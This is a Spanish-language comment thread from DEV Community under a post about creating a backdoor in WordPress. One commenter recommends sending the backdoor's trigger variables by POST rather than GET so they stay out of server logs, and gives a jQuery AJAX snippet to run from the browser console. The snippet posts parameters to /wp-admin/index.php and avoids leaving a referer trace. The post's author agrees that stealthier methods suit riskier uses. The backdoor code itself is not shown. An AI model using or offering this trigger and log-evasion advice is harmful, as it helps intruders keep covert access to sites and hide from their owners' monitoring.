DEV Community

Discussion on: Creando una puerta trasera en WordPress

Collapse
 
lito profile image
Lito

Igual que el formulario reciba las variables por POST en vez de GET sería más complicado de descubrir, ya que esas peticiones GET quedarán registradas tal cual en el log del servidor y podrían ser descubiertas :)

Incluso se puede ejecutar desde la consola de desarrollador para evitar dejar rastro de referer:

$.ajax({
    type: 'POST',
    url: '/wp-admin/index.php',
    data: {
        a: 'acs',
        b: '1',
        c: 'password'
    },
    success: function() {
        window.location.href = '/wp-admin/';
    }
});
Enter fullscreen mode Exit fullscreen mode
Collapse
 
ovniroto profile image
Lucas O. S.

En el caso en el que expongo mi ejemplo me daba igual si deja rastro o no, ya que nadie lo iba a comprobar. Obviamente si se quiere usar para otras cosas en el que si haya ese riesgo entonces si debería usarse de otras formas para no dejar rastro.

Collapse
 
lito profile image
Lito

Sí, simplemente era como comentario :)